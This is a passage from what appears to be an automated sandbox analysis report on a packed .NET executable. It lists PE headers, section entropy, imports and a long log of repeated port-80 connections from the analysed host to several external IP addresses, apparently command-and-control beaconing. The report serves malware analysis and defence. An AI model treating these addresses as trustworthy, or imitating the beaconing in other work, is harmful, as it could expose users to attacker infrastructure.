                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xca0000x600.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xcc0000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000xc78640xc7a006d21c3711f3040f8ab6d5efd1fbb1193False0.8848634646994364data7.793030920225636IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xca0000x6000x6004f4d85abf16d5b538b0ba1d780db1df5False0.4225260416666667data4.07542218621942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xcc0000xc0x200d462cb3f75d9bb7fc9f1043e445f002fFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_VERSION0xca0900x31cdata0.43467336683417085
                                                                                                      RT_MANIFEST0xca3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Apr 16, 2024 11:59:23.612093925 CEST4971780192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 11:59:23.735536098 CEST8049717174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 11:59:23.735747099 CEST4971780192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 11:59:23.736241102 CEST4971780192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 11:59:23.859412909 CEST8049717174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 11:59:23.859477997 CEST8049717174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 11:59:23.859514952 CEST8049717174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 11:59:23.859554052 CEST8049717174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 11:59:23.859744072 CEST4971780192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 11:59:23.859744072 CEST4971780192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 11:59:23.860186100 CEST4971780192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 11:59:23.983172894 CEST8049717174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 11:59:39.074688911 CEST4971880192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:39.285959005 CEST804971891.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:39.286446095 CEST4971880192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:39.286670923 CEST4971880192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:39.497817039 CEST804971891.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:41.815253019 CEST4971980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:42.026639938 CEST804971991.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:42.026798010 CEST4971980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:42.027034998 CEST4971980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:42.243251085 CEST804971991.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:42.243316889 CEST804971991.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:42.243396997 CEST4971980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:43.661014080 CEST4971980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:44.674346924 CEST4972080192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:44.885425091 CEST804972091.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:44.885535955 CEST4972080192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:44.885751009 CEST4972080192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:45.096376896 CEST804972091.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:45.097322941 CEST804972091.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:45.097414017 CEST804972091.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:45.097457886 CEST4972080192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:46.392904043 CEST4972080192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:47.408839941 CEST4972180192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:47.620577097 CEST804972191.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:47.622143984 CEST4972180192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:47.622231007 CEST4972180192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:47.834570885 CEST804972191.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:47.834635019 CEST804972191.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:47.834724903 CEST4972180192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:47.834830999 CEST4972180192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:48.046402931 CEST804972191.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:53.148947001 CEST4972380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:53.359802008 CEST804972391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:53.360054016 CEST4972380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:53.360054016 CEST4972380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:53.572321892 CEST804972391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:53.572356939 CEST804972391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:53.572484016 CEST4972380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:54.861630917 CEST4972380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:55.877693892 CEST4972480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:56.089368105 CEST804972491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:56.089569092 CEST4972480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:56.089665890 CEST4972480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:56.301956892 CEST804972491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:56.302023888 CEST804972491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:56.302263975 CEST4972480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:57.596106052 CEST4972480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:58.612458944 CEST4972580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:58.823683977 CEST804972591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:58.823839903 CEST4972580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:58.824157953 CEST4972580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 11:59:59.039223909 CEST804972591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:59.039840937 CEST804972591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:59.039882898 CEST804972591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 11:59:59.039963961 CEST4972580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:00.885813951 CEST4972580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:01.893198013 CEST4972680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:02.105047941 CEST804972691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:02.105132103 CEST4972680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:02.105271101 CEST4972680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:02.317255974 CEST804972691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:02.317321062 CEST804972691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:02.317378998 CEST4972680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:02.317461014 CEST4972680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:02.528798103 CEST804972691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:08.186081886 CEST4972780192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:08.506278992 CEST804972743.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:08.506376028 CEST4972780192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:08.506663084 CEST4972780192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:08.828423977 CEST804972743.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:08.866709948 CEST804972743.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:08.866775036 CEST804972743.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:08.870923042 CEST4972780192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:10.018038988 CEST4972780192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:11.033940077 CEST4972880192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:11.351258993 CEST804972843.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:11.354862928 CEST4972880192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:11.355138063 CEST4972880192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:11.672348022 CEST804972843.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:11.710948944 CEST804972843.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:11.710969925 CEST804972843.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:11.711033106 CEST4972880192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:12.861797094 CEST4972880192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:13.877670050 CEST4973080192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:14.194549084 CEST804973043.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:14.194763899 CEST4973080192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:14.194952965 CEST4973080192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:14.511411905 CEST804973043.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:14.511467934 CEST804973043.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:14.550072908 CEST804973043.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:14.550095081 CEST804973043.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:14.550137997 CEST4973080192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:15.705487013 CEST4973080192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:16.721465111 CEST4973180192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:17.039700031 CEST804973143.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:17.042936087 CEST4973180192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:18.080573082 CEST4973180192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:18.398400068 CEST804973143.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:18.436594963 CEST804973143.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:18.436661005 CEST804973143.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:18.436877966 CEST4973180192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:18.436878920 CEST4973180192.168.2.543.132.191.179
                                                                                                      Apr 16, 2024 12:00:18.754728079 CEST804973143.132.191.179192.168.2.5
                                                                                                      Apr 16, 2024 12:00:23.593097925 CEST4973280192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:23.803834915 CEST804973291.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:23.803941011 CEST4973280192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:23.804136038 CEST4973280192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:24.015396118 CEST804973291.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:24.015458107 CEST804973291.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:24.015571117 CEST4973280192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:25.314663887 CEST4973280192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:26.330877066 CEST4973380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:26.541790009 CEST804973391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:26.542957067 CEST4973380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:26.544164896 CEST4973380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:26.756022930 CEST804973391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:26.756088018 CEST804973391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:26.756262064 CEST4973380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:28.050911903 CEST4973380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:29.065135956 CEST4973480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:29.276356936 CEST804973491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:29.276443005 CEST4973480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:29.276652098 CEST4973480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:29.487473965 CEST804973491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:29.487752914 CEST804973491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:29.487792015 CEST804973491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:29.487849951 CEST4973480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:30.783530951 CEST4973480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:31.799422979 CEST4973580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:32.009993076 CEST804973591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:32.010143995 CEST4973580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:32.010354042 CEST4973580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:32.226129055 CEST804973591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:32.226174116 CEST804973591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:32.226301908 CEST4973580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:32.226396084 CEST4973580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:32.437082052 CEST804973591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:37.380847931 CEST4973680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:37.591455936 CEST804973691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:37.591618061 CEST4973680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:37.591880083 CEST4973680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:37.803324938 CEST804973691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:37.803348064 CEST804973691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:37.804831028 CEST4973680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:39.095941067 CEST4973680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:40.112258911 CEST4973780192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:40.323411942 CEST804973791.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:40.326937914 CEST4973780192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:40.327210903 CEST4973780192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:40.549858093 CEST804973791.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:40.549917936 CEST804973791.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:40.555067062 CEST4973780192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:41.830878973 CEST4973780192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:42.846929073 CEST4973880192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:43.058187962 CEST804973891.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:43.058306932 CEST4973880192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:43.058501959 CEST4973880192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:43.269589901 CEST804973891.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:43.270207882 CEST804973891.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:43.270246983 CEST804973891.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:43.270382881 CEST4973880192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:44.564820051 CEST4973880192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:45.580796957 CEST4973980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:45.791361094 CEST804973991.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:45.794888973 CEST4973980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:45.798046112 CEST4973980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:46.013204098 CEST804973991.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:46.013228893 CEST804973991.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:46.013586998 CEST4973980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:46.013587952 CEST4973980192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:00:46.224077940 CEST804973991.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.173626900 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:51.277349949 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.277426004 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:51.277666092 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:51.381402969 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.419419050 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.419481039 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.419518948 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.419558048 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.419565916 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:51.419656038 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:51.423152924 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.423204899 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:52.783456087 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:53.800896883 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:53.904999971 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:53.910963058 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:53.910963058 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:54.014940977 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.031459093 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.031506062 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.031541109 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.031577110 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.034785986 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:54.040241003 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.044151068 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:55.424025059 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.440077066 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.543940067 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.544101000 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.544807911 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.648570061 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.648614883 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665306091 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665348053 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665383101 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665411949 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.665417910 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665911913 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.671289921 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.671334028 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:58.052334070 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.065254927 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.169473886 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.169594049 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.169714928 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.273524046 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290175915 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290239096 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290275097 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290314913 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290380955 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.290380955 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.290494919 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.297668934 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.297724962 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.396146059 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.526765108 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.680305004 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.680532932 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.680532932 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.835591078 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847704887 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847744942 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847784996 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847825050 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847848892 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.847989082 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848026037 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848063946 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.848063946 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.848124981 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848161936 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848339081 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848373890 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848407984 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848408937 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.848408937 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.850763083 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:06.190316916 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.205703020 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.362415075 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.362612963 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.362704992 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.521301031 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532691002 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532733917 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532773018 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532813072 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532852888 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532890081 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532903910 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.532905102 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.532928944 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532969952 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532979012 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.533013105 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.533127069 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.533163071 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.533207893 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.533297062 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.533350945 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:08.877403975 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:09.898906946 CEST4974680192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:10.054445028 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.055140972 CEST4974680192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:10.055141926 CEST4974680192.168.2.5203.161.50.128
